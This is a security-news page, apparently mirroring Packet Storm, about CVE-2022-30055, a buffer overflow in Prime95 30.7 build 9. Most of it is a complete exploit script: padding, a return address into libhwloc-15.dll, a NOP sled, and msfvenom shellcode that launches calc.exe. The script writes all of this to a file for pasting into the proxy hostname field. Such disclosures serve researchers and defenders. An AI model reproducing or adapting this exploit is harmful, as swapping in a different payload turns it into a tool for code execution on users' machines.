Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30055: Prime95 30.7 Build 9 Buffer Overflow ≈ Packet Storm

Prime95 30.7 build 9 suffers from a Buffer Overflow vulnerability that could lead to Remote Code Execution.

CVE
#vulnerability#windows#rce#buffer_overflow
# Exploit Title:   Prime95 Version 30.7 build 9 Buffer Overflow RCE# Discovered by: Yehia Elghaly# Discovered Date: 2022-04-25# Vendor Homepage: https://www.mersenne.org/# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip# Tested Version: 30.7 build 9# Vulnerability Type:  Buffer Overflow (RCE) Local# Tested on OS: Windows 7 Professional x86# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE# 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will openbuffer = "A" * 144jum = "\xd8\x29\xe7\x6e" #push esp # ret  |  {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)nop = "\x90" * 20 #Nob hot = "C" * 100#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payloadpayload =  b""payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"payload += b"\xc7\x33\x80\xb2"evil = buffer + jum + nop + payloadfile = open('PExploit.txt','w+')file.write(evil)file.close()

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907